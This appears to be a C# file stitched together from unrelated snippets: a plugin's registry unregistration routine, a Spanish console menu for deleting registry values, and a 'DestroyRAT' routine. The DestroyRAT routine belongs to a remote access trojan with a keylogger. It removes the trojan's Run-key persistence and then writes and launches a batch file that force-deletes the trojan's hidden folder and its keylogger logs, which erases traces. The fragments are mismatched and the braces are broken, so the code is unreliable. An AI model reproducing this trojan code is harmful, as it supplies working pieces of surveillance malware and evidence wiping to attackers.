public static void UnregisterServer()
{
// Create a new registry tools object
RegistryTools registry = new RegistryTools()
{
Hive = PluginHive
};
// This is a 32-bit plugin, so determine if the target
// key needs to access a WoW emulation key
string key =
String.Format(
@"{0}\{1}",
((Platform.GetPlatform() == PlatformType.X64) ?
PluginKeyWow : PluginKey),
PluginGuid
);
// Loop through each of the plugin settings and
// delete them from the registry
foreach (var setting in PluginSettings)
{
registry.DeleteValue(
key,
setting.Key
);
}
// Delete the plugin key altogether
registry.DeleteKey(PluginKey);
}
} //Finish
public void DeleteValue()
{
Console.SetCursorPosition(45, 2);
// Inicio
Console.WriteLine("Eliminar una Llave y los valores que almacena");
Console.WriteLine("");
string path = SetPath();
string valueName = SetValueName();
Console.WriteLine(registro.DeleteValue(path, valueName));
} //Finish
public static void DestroyRAT(bool destroy = false)
{
if (destroy)
{
Console.WriteLine("\n==>[DESTROY RAT] En proceso...\n");
const string pathbat = @"C:\Users\Public" + @"\" + "error.bat";
try {
Console.WriteLine("\n[StartUp] Eliminando registros de arranque...\n");
RegistryTools R = new RegistryTools();
const string PathA = @"Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
Console.WriteLine("[StartUp] Se eliminó del registro = " + R.DeleteValue(PathA, config.NAME_REG));
const string Path = @"Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
Console.WriteLine("[StartUp] Se eliminó del registro = " + R.DeleteValue(Path, config.NAME_REG));
} catch {
Console.WriteLine("Error al eliminar del registro");
}
Console.WriteLine("\n[StartUp] Finish\n");
// Actualiza bat
try {
File.Delete(pathbat);
} catch {
}
const string bat = // Bat que borrará el RAT
"@echo off\n" +
@"cd " + config.PATH_OCUL + "\n" + // Ruta del RAT
@"timeout /t 1 /NOBREAK >null" + "\n" +
@"del /f /q /S *.*" + "\n" +
@"cd " + config.PATH_LOG + "\n" + // Ruta del Keylogger
@"del /f /q /S *.* ";
// Crea Bat
try {
Console.WriteLine("Crea Bat ");
File.WriteAllText(pathbat, bat);
} catch {
Console.WriteLine("El archivo bat, ya existe");
}
//Abre el archivo bat para la eliminación
ProcessStartInfo psi = new ProcessStartInfo();
psi.UseShellExecute = false;
psi.FileName = pathbat;
//Process.Start(psi);
Process.Start(pathbat);
// Cierra Telegram
Environment.Exit(1);
//// New Name *.pdb
//string exeName = config.NAME_EXE;
//exeName = exeName.Substring(0, exeName.Length - 4);
//Console.WriteLine("\n==>[Troyano] Finish\n");
}
}